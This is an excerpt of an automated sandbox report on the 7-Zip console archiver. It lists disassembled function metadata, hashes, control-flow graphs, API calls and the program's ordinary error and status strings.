                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrowmemmove$malloc
                                • String ID: Cannot create output directory
                                • API String ID: 159934335-1181934277
                                • Opcode ID: d07fb803fdde0e9ce25cb8ea744738adf1a058334bec32f4f047af4c6aacca0b
                                • Instruction ID: f5f5c5aa5a881306e95dce41f89c51d1dcc936771875771750f28502cf114d9c
                                • Opcode Fuzzy Hash: d07fb803fdde0e9ce25cb8ea744738adf1a058334bec32f4f047af4c6aacca0b
                                • Instruction Fuzzy Hash: 70428F32649AC992CB30EB36F59039EA361F789784F445117DE9D47B19DE3CC8A5CB08
                                Function 00425134 Relevance: 63.8, APIs: 22, Strings: 14, Instructions: 809COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                • Unsupported command:, xrefs: 004251C5
                                • I won't write data and program's messages to same stream, xrefs: 00425AA3, 00425D98
                                • Cannot use absolute pathnames for this command, xrefs: 004258E8
                                • The command must be specified, xrefs: 0042515E
                                • Cannot find archive name, xrefs: 0042558E
                                • -ai switch is not supported for this command, xrefs: 00425BB4
                                • Unsupported -spf:, xrefs: 004252DF
                                • stdout mode and email mode cannot be combined, xrefs: 00425D26
                                • I won't write compressed data to a terminal, xrefs: 00425D57
                                • Incorrect number of benchmark iterations, xrefs: 00425E5F
                                • Only one archive can be created with rename command, xrefs: 00425DF7
                                • Unsupported -snz:, xrefs: 00425953
                                • Archive name cannot by empty, xrefs: 004255D4
                                • Unsupported -spm:, xrefs: 0042552D
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ExceptionThrow$wcscmp$free
                                • String ID: -ai switch is not supported for this command$Archive name cannot by empty$Cannot find archive name$Cannot use absolute pathnames for this command$I won't write compressed data to a terminal$I won't write data and program's messages to same stream$Incorrect number of benchmark iterations$Only one archive can be created with rename command$The command must be specified$Unsupported -snz:$Unsupported -spf:$Unsupported -spm:$Unsupported command:$stdout mode and email mode cannot be combined
                                • API String ID: 225321437-2319225105
                                • Opcode ID: 3202f9a66226af083b18468dc7675a34c977d3d8c8771206bff99535c8c8a207
                                • Instruction ID: a7789aaf9232d1842cfbfd2da2e1e8ad18810b17950c7acbcc9baaa189b545d6
                                • Opcode Fuzzy Hash: 3202f9a66226af083b18468dc7675a34c977d3d8c8771206bff99535c8c8a207
                                • Instruction Fuzzy Hash: AC82B1B3304AC0A6DB28CB29E5803EEBB61F355784F888057D79947B25DB7CD5A9C708
                                Function 0044D9EE Relevance: 55.6, APIs: 44, Instructions: 648COMMON
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 0793fe45066a34d6d5cd66e6672ae7da3db77f5e7ca3707c0a85dc2c1ae100a2
                                • Instruction ID: d4ce7193940798983e491c658e2417b292a25fb0ac4d531958a477d915161f3d
                                • Opcode Fuzzy Hash: 0793fe45066a34d6d5cd66e6672ae7da3db77f5e7ca3707c0a85dc2c1ae100a2
                                • Instruction Fuzzy Hash: 3F42A036209AC886DB20EB36E1906AF7764F385B8CF855007DE9A87B15DF7CC499C709
                                Function 0041798C Relevance: 40.7, APIs: 27, Instructions: 239COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2172 41798c-4179a8 call 4186c8 2174 4179ad-4179b0 2172->2174 2175 4179b2-4179b4 2174->2175 2176 4179bd-4179c7 call 41ae24 2174->2176 2175->2176 2177 4179b6-4179b8 2175->2177 2181 4179d0-4179fa call 41af80 call 4135b8 call 413b28 2176->2181 2182 4179c9-4179cb 2176->2182 2179 417d13-417d22 2177->2179 2189 4179fc-417a05 2181->2189 2190 417a1f-417a39 call 4136a8 2181->2190 2182->2179 2189->2190 2191 417a07-417a09 2189->2191 2197 417a3e-417a4a call 41b1e4 2190->2197 2193 417a10-417a19 2191->2193 2194 417a0b 2191->2194 2193->2190 2196 417cbb-417cc8 free 2194->2196 2196->2179 2200 417a4c-417a59 CreateDirectoryW 2197->2200 2201 417a6e-417a70 2197->2201 2202 417c2a-417c2e 2200->2202 2203 417a5f-417a68 GetLastError 2200->2203 2204 417b44-417b4d GetLastError 2201->2204 2205 417a76-417a96 call 41354c call 41b8b0 2201->2205 2209 417c30-417c43 call 41ab3c 2202->2209 2210 417c93-417cab free * 2 2202->2210 2203->2201 2203->2204 2207 417b4f-417b7f call 418290 call 41354c call 4188ec 2204->2207 2208 417bae-417bb7 GetLastError 2204->2208 2228 417b3a-417b3f free 2205->2228 2229 417a9c-417aab CreateDirectoryW 2205->2229 2248 417b81-417b8e free 2207->2248 2249 417b90-417ba5 free 2207->2249 2211 417cad-417cb8 free 2208->2211 2212 417bbd-417bcb call 413b28 2208->2212 2220 417c45-417c49 2209->2220 2221 417c4b 2209->2221 2210->2179 2211->2196 2226 417bd1-417bd3 2212->2226 2227 417cfc-417d11 free * 2 2212->2227 2225 417c4f-417c6d call 4137f0 call 4173b0 2220->2225 2221->2225 2254 417c77-417c8e free * 2 2225->2254 2255 417c6f-417c73 2225->2255 2226->2227 2232 417bd9-417be0 2226->2232 2227->2179 2228->2204 2233 417ab1-417aba GetLastError 2229->2233 2234 417c20-417c25 free 2229->2234 2237 417be2-417be6 2232->2237 2238 417bf6-417bfc 2232->2238 2239 417acb-417af7 call 418290 call 41354c call 4188ec 2233->2239 2240 417abc-417ac6 free 2233->2240 2234->2202 2243 417cca-417ce1 free * 2 2237->2243 2244 417bec-417bf0 2237->2244 2245 417ce3-417cfa free * 2 2238->2245 2246 417c02-417c06 2238->2246 2261 417b16-417b38 free * 2 2239->2261 2262 417af9-417b11 free * 2 2239->2262 2240->2208 2243->2179 2244->2238 2244->2243 2245->2179 2246->2197 2252 417c0c-417c1b 2246->2252 2248->2208 2250 417baa-417bac 2249->2250 2250->2202 2250->2208 2252->2197 2254->2179 2255->2209 2258 417c75 2255->2258 2258->2210 2261->2250 2262->2208
                                APIs
                                  • Part of subcall function 004186C8: GetFileAttributesW.KERNELBASE ref: 004186EA
                                  • Part of subcall function 004186C8: GetFileAttributesW.KERNEL32 ref: 00418721
                                  • Part of subcall function 004186C8: free.MSVCRT ref: 0041872E
                                • free.MSVCRT ref: 00417CC0
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: AttributesFilefree
                                • String ID:
                                • API String ID: 1936811914-0
                                • Opcode ID: d5df66043947abe2c4a22f88f0be180330a6ff37c290fd6690ffada23aa0e52b
                                • Instruction ID: 0d2654d05cc18fa3c60727f9aa4824fc173849ffc6865b095d40e616d3abd9c7
                                • Opcode Fuzzy Hash: d5df66043947abe2c4a22f88f0be180330a6ff37c290fd6690ffada23aa0e52b
                                • Instruction Fuzzy Hash: CD81A43225C58982CB20EB22E4413EE6331FBC5788F501217EE9E87669EF6CC9D5C749
                                Function 00426830 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 56COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: CloseHandle$ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                • String ID: SeSecurityPrivilege
                                • API String ID: 1313864721-2333288578
                                • Opcode ID: 13693f38d7738a30ba756f3a7d22b965bb90a9711b1adfad48e363eb8eb3698f
                                • Instruction ID: 9bccead4449ac0a1ba8216579694df36e7b4d5fcfce69d6d7750917339131d60
                                • Opcode Fuzzy Hash: 13693f38d7738a30ba756f3a7d22b965bb90a9711b1adfad48e363eb8eb3698f
                                • Instruction Fuzzy Hash: CC1151B230AB84C2DA019B22F95436EB366FBC4B81FD50106EA8F82E58CF7CC449C714
                                Function 0041BD0C Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentProcess.KERNEL32 ref: 0041BD1C
                                • OpenProcessToken.ADVAPI32 ref: 0041BD2D
                                • LookupPrivilegeValueW.ADVAPI32 ref: 0041BD41
                                • AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?,?,?,?,004239B9), ref: 0041BD78
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,004239B9), ref: 0041BD82
                                • CloseHandle.KERNELBASE ref: 0041BD92
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: ProcessToken$AdjustCloseCurrentErrorHandleLastLookupOpenPrivilegePrivilegesValue
                                • String ID:
                                • API String ID: 3398352648-0
                                • Opcode ID: d0eb4f3097e7eb5d21bf66f0fe04757f56b0f7c49c0d7fccda7d879dd754992b
                                • Instruction ID: 3541f036d73c18f9c40b7543d5810b06082f498d25c01de213c7dfa98a2fad8e
                                • Opcode Fuzzy Hash: d0eb4f3097e7eb5d21bf66f0fe04757f56b0f7c49c0d7fccda7d879dd754992b
                                • Instruction Fuzzy Hash: 550152B2619681C7DB108FB0F88479E7361F780B95F545535EB8A83654CF3CC449CB44
                                Function 00418318 Relevance: 4.6, APIs: 3, Instructions: 70fileCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004182EC: FindClose.KERNELBASE ref: 004182FE
                                • FindFirstFileW.KERNELBASE ref: 0041835A
                                  • Part of subcall function 00413730: free.MSVCRT ref: 0041376A
                                  • Part of subcall function 00413730: memmove.MSVCRT(00000000,?,?,00000000,004110B0), ref: 00413785
                                • FindFirstFileW.KERNELBASE ref: 0041839A
                                • free.MSVCRT ref: 004183A8
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: Find$FileFirstfree$Closememmove
                                • String ID:
                                • API String ID: 2921071498-0
                                • Opcode ID: 478098d449921422a8781cf95dc01b92ef8f41cc977b03dca469aad60f3efd98
                                • Instruction ID: b5330e60c54956cc50c9f08ca021fb0d9c050131b3b6734f2e099aa56915e952
                                • Opcode Fuzzy Hash: 478098d449921422a8781cf95dc01b92ef8f41cc977b03dca469aad60f3efd98
                                • Instruction Fuzzy Hash: C1213C72204A8486DB21DF25E84039A6364F789BB8F544316EABD477D9DF3DC986C704
                                Function 0046971A Relevance: 119.8, APIs: 50, Strings: 18, Instructions: 768COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 311 46971a-46971d 312 469723-469732 call 422ec8 311->312 313 469c9e-469cfd call 455a44 call 412350 311->313 318 469a6e-469a76 312->318 319 469738-46973f 312->319 332 469d14 313->332 333 469cff-469d12 call 4136a8 313->333 321 469c42-469c4c 318->321 322 469a7c-469a8d call 46779c 318->322 323 469741-469748 319->323 324 46975e-4697d8 call 462ec8 call 41354c 319->324 328 469c7e-469c9d _CxxThrowException 321->328 329 469c4e-469c79 call 4124c4 fputs * 2 call 4124c4 321->329 342 469a8f-469a93 322->342 343 469a9a-469bac call 466c40 call 412ecc call 412db8 call 443054 call 412db8 call 412ecc call 466e78 322->343 323->324 331 46974a-469759 call 4138a8 323->331 350 4697e5-469874 call 413798 call 46769c call 41354c 324->350 351 4697da-4697e1 324->351 328->313 329->328 331->324 340 469d17-469d56 call 455a44 call 412350 332->340 333->340 362 469d6d 340->362 363 469d58-469d6b call 4136a8 340->363 342->343 403 469bde-469c3d free * 6 call 466cd0 343->403 404 469bae 343->404 377 469876-46987a 350->377 378 469881-469890 350->378 351->350 354 4697e3 351->354 354->350 367 469d70-469f28 call 412350 362->367 363->367 385 469f37 367->385 386 469f2a-469f35 call 466898 367->386 377->378 379 4698a5 378->379 380 469892-469899 378->380 384 4698ad-46996b call 413798 call 466c40 call 412db8 379->384 380->379 383 46989b-4698a3 380->383 383->384 417 46996e call 4587ac 384->417 390 469f3a-469f45 385->390 386->390 394 469f47-469f50 390->394 395 469f51-46a014 call 413798 390->395 394->395 407 46a016-46a01a 395->407 408 46a020-46a0f5 call 466184 call 46682c call 423d28 call 41354c call 440eb4 395->408 416 46a849-46a850 403->416 409 469bb2-469bc8 404->409 407->408 455 46a0f7-46a11f call 4425dc 408->455 456 46a13d-46a1b8 call 43dd64 408->456 411 469bda-469bdc 409->411 412 469bca-469bd5 free * 2 409->412 411->403 411->409 412->411 420 46a852-46a859 416->420 421 46a860-46a863 416->421 419 469973-46997e 417->419 426 469980-46998a call 46b4d0 419->426 427 46998f-4699d6 call 466e78 419->427 420->421 422 46a85b 420->422 424 46a865-46a881 _CxxThrowException 421->424 425 46a882-46a89d free 421->425 428 46a85b call 466550 422->428 424->425 430 46a89f 425->430 431 46a8bd-46a8dc free call 448b60 call 46738c 425->431 426->427 438 469a08-469a69 free * 3 call 466cd0 free call 46b604 427->438 439 4699d8 427->439 428->421 436 46a8a3-46a8bb free 430->436 450 46a8e1-46a918 free call 411874 call 467ec8 431->450 436->431 436->436 438->416 442 4699dc-4699f2 439->442 446 469a04-469a06 442->446 447 4699f4-4699ff free * 2 442->447 446->438 446->442 447->446 464 46a94a-46a96b free 450->464 465 46a91a 450->465 455->456 468 46a121-46a13c _CxxThrowException 455->468 461 46a1bd-46a1c7 456->461 466 46a1d4-46a1dc 461->466 467 46a1c9-46a1cf call 46b4d0 461->467 469 46a91e-46a934 465->469 471 46a231-46a23e 466->471 472 46a1de-46a1e8 466->472 467->466 468->456 473 46a946-46a948 469->473 474 46a936-46a941 free * 2 469->474 477 46a2a0-46a2a7 471->477 478 46a240-46a243 call 4124c4 471->478 475 46a225-46a22d 472->475 476 46a1ea-46a220 call 4124c4 fputs call 4124c4 call 412790 call 4124c4 472->476 473->464 473->469 474->473 475->471 476->475 481 46a2d7-46a2de 477->481 482 46a2a9-46a2ae 477->482 483 46a248-46a250 478->483 484 46a312-46a315 481->484 485 46a2e0-46a2e5 481->485 482->481 487 46a2b0-46a2d2 fputs call 41263c call 4124c4 482->487 483->477 488 46a252-46a29b fputs call 41263c call 4124c4 fputs call 41263c call 4124c4 483->488 490 46a388-46a38f 484->490 491 46a317-46a31e 484->491 489 46a2eb-46a30d fputs call 41263c call 4124c4 485->489 485->490 487->481 488->477 489->484 496 46a3d0-46a3d3 490->496 497 46a391-46a396 490->497 498 46a347-46a34e 491->498 499 46a320-46a342 fputs call 41263c call 4124c4 491->499 504 46a3d5 496->504 509 46a3e0-46a3e3 496->509 497->504 505 46a398-46a3a7 call 4124c4 497->505 498->490 508 46a350-46a35f call 4124c4 498->508 499->498 504->509 505->504 532 46a3a9-46a3cb fputs call 41263c call 4124c4 505->532 508->490 527 46a361-46a383 fputs call 41263c call 4124c4 508->527 511 46a594-46a7a9 free * 2 call 440c24 free call 46786c 509->511 512 46a3e9-46a3f0 509->512 562 46a7dc-46a7f8 free 511->562 563 46a7ab 511->563 520 46a3f6-46a3fd 512->520 521 46a55b-46a56a call 4124c4 512->521 520->521 529 46a403-46a406 520->529 521->511 544 46a56c-46a593 fputs call 41263c call 4124c4 521->544 527->490 529->511 535 46a40c-46a417 529->535 532->496 541 46a449-46a452 535->541 542 46a419-46a441 fputs call 41263c call 4124c4 535->542 548 46a467-46a48a fputs call 41263c call 4124c4 541->548 549 46a454-46a457 541->549 542->541 544->511 568 46a48f-46a497 548->568 549->548 554 46a459-46a461 549->554 554->548 559 46a4e9-46a537 fputs call 41263c call 4124c4 fputs call 41263c call 4124c4 554->559 588 46a53c-46a53f 559->588 570 46a7fa 562->570 571 46a82b-46a83a free 562->571 569 46a7af-46a7c5 563->569 568->559 573 46a499-46a4e4 fputs call 41263c call 4124c4 fputs call 41263c call 4124c4 568->573 574 46a7d7-46a7da 569->574 575 46a7c7-46a7d2 free * 2 569->575 576 46a7fe-46a814 570->576 571->416 573->559 574->562 574->569 575->574 579 46a826-46a829 576->579 580 46a816-46a821 free * 2 576->580 579->571 579->576 580->579 588->511 590 46a541-46a559 call 4124c4 call 462354 588->590 590->511
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: free$ExceptionThrowfputs$fputc
                                • String ID: 7zCon.sfx$Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$ERROR: $Files: $Folders: $Incorrect command line$OK archives: $Open Errors: $Size: $Sub items Errors: $Warnings:
                                • API String ID: 1639683984-435538426
                                • Opcode ID: 0e070eb633bd7c910bb6203619f98dd6c0f55f65c104b89efa42c83942ccc977
                                • Instruction ID: c812a3d05c93557c2d33ee454497fa17e5836bf81c98cd5f3f4a8df3f8abd592
                                • Opcode Fuzzy Hash: 0e070eb633bd7c910bb6203619f98dd6c0f55f65c104b89efa42c83942ccc977
                                • Instruction Fuzzy Hash: 5E729E72209AC195DB34EB26E5903DEB360F785788F44412BDA8D43B19EF7CC5A5CB0A
                                Function 00469DFD Relevance: 86.2, APIs: 34, Strings: 15, Instructions: 500COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1181 469dfd-469dff 1182 469e01-469e14 fputs call 4124c4 1181->1182 1183 469e19-469ebf call 45fde4 call 41354c call 43c0c8 free 1181->1183 1182->1183 1191 469ed0-469ed3 1183->1191 1192 469ec1-469ecb call 46b4d0 1183->1192 1193 469ef4-469f28 call 46b604 call 412350 1191->1193 1194 469ed5-469edc 1191->1194 1192->1191 1205 469f37 1193->1205 1206 469f2a-469f35 call 466898 1193->1206 1194->1193 1196 469ede-469eee call 4601fc 1194->1196 1200 469ef3 1196->1200 1200->1193 1208 469f3a-469f45 1205->1208 1206->1208 1210 469f47-469f50 1208->1210 1211 469f51-46a014 call 413798 1208->1211 1210->1211 1215 46a016-46a01a 1211->1215 1216 46a020-46a0f5 call 466184 call 46682c call 423d28 call 41354c call 440eb4 1211->1216 1215->1216 1227 46a0f7-46a11f call 4425dc 1216->1227 1228 46a13d-46a1c7 call 43dd64 1216->1228 1227->1228 1235 46a121-46a13c _CxxThrowException 1227->1235 1233 46a1d4-46a1dc 1228->1233 1234 46a1c9-46a1cf call 46b4d0 1228->1234 1237 46a231-46a23e 1233->1237 1238 46a1de-46a1e8 1233->1238 1234->1233 1235->1228 1241 46a2a0-46a2a7 1237->1241 1242 46a240-46a243 call 4124c4 1237->1242 1239 46a225-46a22d 1238->1239 1240 46a1ea-46a220 call 4124c4 fputs call 4124c4 call 412790 call 4124c4 1238->1240 1239->1237 1240->1239 1245 46a2d7-46a2de 1241->1245 1246 46a2a9-46a2ae 1241->1246 1247 46a248-46a250 1242->1247 1248 46a312-46a315 1245->1248 1249 46a2e0-46a2e5 1245->1249 1246->1245 1251 46a2b0-46a2d2 fputs call 41263c call 4124c4 1246->1251 1247->1241 1252 46a252-46a29b fputs call 41263c call 4124c4 fputs call 41263c call 4124c4 1247->1252 1254 46a388-46a38f 1248->1254 1255 46a317-46a31e 1248->1255 1253 46a2eb-46a30d fputs call 41263c call 4124c4 1249->1253 1249->1254 1251->1245 1252->1241 1253->1248 1260 46a3d0-46a3d3 1254->1260 1261 46a391-46a396 1254->1261 1262 46a347-46a34e 1255->1262 1263 46a320-46a342 fputs call 41263c call 4124c4 1255->1263 1268 46a3d5 1260->1268 1273 46a3e0-46a3e3 1260->1273 1261->1268 1269 46a398-46a3a7 call 4124c4 1261->1269 1262->1254 1272 46a350-46a35f call 4124c4 1262->1272 1263->1262 1268->1273 1269->1268 1296 46a3a9-46a3cb fputs call 41263c call 4124c4 1269->1296 1272->1254 1291 46a361-46a383 fputs call 41263c call 4124c4 1272->1291 1275 46a594-46a7a9 free * 2 call 440c24 free call 46786c 1273->1275 1276 46a3e9-46a3f0 1273->1276 1326 46a7dc-46a7f8 free 1275->1326 1327 46a7ab 1275->1327 1284 46a3f6-46a3fd 1276->1284 1285 46a55b-46a56a call 4124c4 1276->1285 1284->1285 1293 46a403-46a406 1284->1293 1285->1275 1308 46a56c-46a593 fputs call 41263c call 4124c4 1285->1308 1291->1254 1293->1275 1299 46a40c-46a417 1293->1299 1296->1260 1305 46a449-46a452 1299->1305 1306 46a419-46a441 fputs call 41263c call 4124c4 1299->1306 1312 46a467-46a48a fputs call 41263c call 4124c4 1305->1312 1313 46a454-46a457 1305->1313 1306->1305 1308->1275 1332 46a48f-46a497 1312->1332 1313->1312 1318 46a459-46a461 1313->1318 1318->1312 1323 46a4e9-46a537 fputs call 41263c call 4124c4 fputs call 41263c call 4124c4 1318->1323 1363 46a53c-46a53f 1323->1363 1334 46a7fa 1326->1334 1335 46a82b-46a850 free 1326->1335 1333 46a7af-46a7c5 1327->1333 1332->1323 1337 46a499-46a4e4 fputs call 41263c call 4124c4 fputs call 41263c call 4124c4 1332->1337 1338 46a7d7-46a7da 1333->1338 1339 46a7c7-46a7d2 free * 2 1333->1339 1340 46a7fe-46a814 1334->1340 1347 46a852-46a859 1335->1347 1348 46a860-46a863 1335->1348 1337->1323 1338->1326 1338->1333 1339->1338 1344 46a826-46a829 1340->1344 1345 46a816-46a821 free * 2 1340->1345 1344->1335 1344->1340 1345->1344 1347->1348 1349 46a85b call 466550 1347->1349 1351 46a865-46a881 _CxxThrowException 1348->1351 1352 46a882-46a89d free 1348->1352 1349->1348 1351->1352 1356 46a89f 1352->1356 1357 46a8bd-46a8dc free call 448b60 call 46738c 1352->1357 1361 46a8a3-46a8bb free 1356->1361 1371 46a8e1-46a918 free call 411874 call 467ec8 1357->1371 1361->1357 1361->1361 1363->1275 1366 46a541-46a559 call 4124c4 call 462354 1363->1366 1366->1275 1379 46a94a-46a96b free 1371->1379 1380 46a91a 1371->1380 1381 46a91e-46a934 1380->1381 1382 46a946-46a948 1381->1382 1383 46a936-46a941 free * 2 1381->1383 1382->1379 1382->1381 1383->1382
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1874078280.0000000000411000.00000020.00000001.01000000.00000008.sdmp, Offset: 00410000, based on PE: true
                                • Associated: 00000005.00000002.1874055934.0000000000410000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874123006.0000000000470000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874156294.0000000000491000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 00000005.00000002.1874177917.0000000000494000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_410000_7z.jbxd
                                Similarity
                                • API ID: fputcfputsfree
                                • String ID: Alternate Streams Size: $Alternate Streams: $Archives with Errors: $Archives with Warnings: $Archives: $Can't open as archive: $Compressed: $ERROR:$Files: $Folders: $OK archives: $Open Errors: $Scanning the drive for archives:$Size: $Warnings:
                                • API String ID: 2822829076-727241755
                                • Opcode ID: c988a466015cf378610806e387c109d2c9731fd235777e19d3319dcfc8bf9c38
                                • Instruction ID: f66a1de4e5088d47387b6db332f459de391e60e4f94ef2e0fc9e4285461c67c5
                                • Opcode Fuzzy Hash: c988a466015cf378610806e387c109d2c9731fd235777e19d3319dcfc8bf9c38
                                • Instruction Fuzzy Hash: 14229E72309AC191CA34EB26E5903DEB360F785B88F44412BDA9D43B59DF7CC5A5CB0A
                                Function 00448CBC Relevance: 51.1, APIs: 25, Strings: 4, Instructions: 368libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 2063 448cbc-448d25 GetProcAddress * 2 2064 448d27-448d3a GetProcAddress 2063->2064 2065 448d50-448d66 GetProcAddress 2063->2065 2066 448d3c-448d49 2064->2066 2067 448d6f-448d7a 2064->2067 2065->2067 2068 448d68-448d6a 2065->2068 2066->2067 2074 448d4b 2066->2074 2070 4492e0 2067->2070 2071 448d80-448e34 call 41354c call 44760c 2067->2071 2069 4492e2-4492f5 2068->2069 2070->2069 2078 4491e4 2071->2078 2079 448e3a-448e4e 2071->2079 2074->2069 2082 4492cf-4492de call 441784 2078->2082 2080 448e60-448e65 2079->2080 2081 448e50-448e5e 2079->2081 2086 448e6c-448e6f 2080->2086 2081->2086 2082->2069 2087 448e71-448e89 call 41be6c call 441784 2086->2087 2088 448e8e-448e94 2086->2088 2106 4491d0-4491d9 2087->2106 2090 448e96-448eae call 41be6c call 441784 2088->2090 2091 448eb3-448ec1 SysStringByteLen 2088->2091 2090->2106 2093 448ec7-448f27 call 41bf00 call 41be6c call 41354c * 2 call 44760c 2091->2093 2094 4491e9-4491f9 call 41be6c 2091->2094 2115 448f2d-448f50 call 44760c 2093->2115 2116 4491fe-449214 free * 2 2093->2116 2094->2082 2106->2071 2107 4491df 2106->2107 2107->2070 2119 448f56-448fc9 call 448580 call 44748c call 447544 2115->2119 2120 449219-44922f free * 2 2115->2120 2116->2082 2127 449234-44924a free * 2 2119->2127 2128 448fcf-448fe0 2119->2128 2120->2082 2127->2082 2129 449032-449065 call 447544 2128->2129 2130 448fe2-448fe9 2128->2130 2135 44924f-449265 free * 2 2129->2135 2136 44906b-449098 call 447eb0 2129->2136 2132 448fef-44901d call 44748c 2130->2132 2139 